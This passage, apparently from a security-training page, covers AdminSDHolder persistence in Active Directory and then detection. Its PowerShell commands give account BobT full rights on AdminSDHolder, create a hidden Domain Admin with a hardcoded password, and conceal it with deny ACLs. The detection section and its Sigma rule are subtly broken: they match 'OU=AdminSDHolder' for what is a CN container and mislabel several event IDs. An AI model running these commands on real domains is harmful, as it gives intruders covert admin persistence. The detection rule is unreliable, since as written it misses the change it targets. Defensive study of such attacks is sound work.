# --- New Window Opens --- #
 
PS> Import-Module .\PowerSploit.psd1
PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System' -PrincipalIdentity BobT -Rights All
 
PS> # Confirming Permissions Added
PS> Get-DomainObjectAcl -Identity `CN=AdminSDHolder,CN=System` -ResolveGUIDs
 
InheritedObjectType   : All
ObjectDN              : CN=AdminSDHolder,CN=System,DC=Domain,DC=com
ObjectType            : All
IdentityReference     : Domain\BobT
IsInherited           : False
ActiveDirectoryRights : GenericAll
PropagationFlags      : None
ObjectFlags           : None
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             :

STEP 3 Use permissions to regain access

the attacker has control of the JoeD and BobT accounts and has created a persistence mechanism that will allow them to regain Domain Admins privileges if they lose access to JoeD. BobT is a shadow administrator of the Active Directory domain.

If he has lost access to JoeD’s account. Instead of having to AS-REP roast again or use some other method, the attacker can use BobT’s account to re-establish their position.

PS> Add-ADGroupMember -Identity "Domain Admins" -Members BobT
PS> # Re-authenticate as User1 to get updated group membership or if no password then wait until user re-autenticates
PS> runas.exe /user:domain\BobT powershell
 
PS> New-ADOrganizationalUnit -Path "DC=domain,DC=com" -Name "Users"
PS> New-ADUser -AccountPassword (ConvertTo-SecureString -AsPlainText -Force -String "MySimplePassword123!") -SamAccountName PaulaS -Name "Paula Smith" -DisplayName "Paula Smith" -EmailAddress "Paula.Smith@domain.com" -PasswordNeverExpires $True -Path "OU=Users,DC=domain,DC=com"
PS> Add-ADGroupMember -Identity "Domain Admins" -Members PaulaS
PS> # Hide the PaulaS and Users OU
PS> Import-Module RACE.psm1
PS> Set-ADACL -SamAccountName Everyone -Right ReadProperty -Type Deny -DistinguishedName (Get-ADUser PaulaS)
PS> Set-ADACL -SAMAccountName Everyone -Right ListChildren -Type Deny -DistinguishedName "OU=Users,DC=domain,DC=com" 
PS> # Remove BobT from Domain Admins to hide privileges
PS> Remove-ADGroupMember -Identity "Domain Admins" -Members BobT
PC>

  • Watching for changes to the AdminSDHolder container ACL is a good way to detect potentially malicious activity. In a normal environment, changes to AdminSDHolder should occur infrequently and follow change control processes.

  • Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes.

  • To identify changes to the AdminSDHolder container ACL, monitor events that match the ObjectDN “CN=AdminSDHolder,DC=System” and the AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.

SIGMA 

title: Detect AdminSDHolder Privilege Escalation Attempt
id: 
description: Detects suspicious changes to AdminSDHolder-protected objects in Active Directory.
status: test
author: MEDHAT
date: 2023-11-03
references:
  - https://www.example.com/adminsdholder_attack_info

logsource:
  category: windows
  product: windows
  service: security
  definition: 'EventID IN (5136, 5137, 5139, 5141)'

detection:
  selection:
    - EventID: 5136 # Object modification event
      ObjectType: 'user' # Targeted object type (user, group, etc.)
      ObjectDN: '*OU=AdminSDHolder*' # Check if the object is within the AdminSDHolder OU
    - EventID: 5137 # Security group modified event
      ObjectType: 'group'
      ObjectDN: '*OU=AdminSDHolder*'
    - EventID: 5139 # Domain policy modified event
      ObjectType: 'domainPolicy'
      ObjectDN: '*CN=AdminSDHolder*'
    - EventID: 5141 # Distribution group modified event
      ObjectType: 'group'
      ObjectDN: '*OU=AdminSDHolder*'
  condition: selection

falsepositives:
  - Legitimate administrative modifications to AdminSDHolder-protected objects.

tags:
  - attack.adminsdholder
  - attack.privilege_escalation
  - attack.active_directory

level: high

  • The rule monitors specific Event IDs (5136, 5137, 5139, 5141) that correspond to object modifications and changes in Active Directory.

PreviousInvestigating with Windows Event LogsNextHunt Evil

Last updated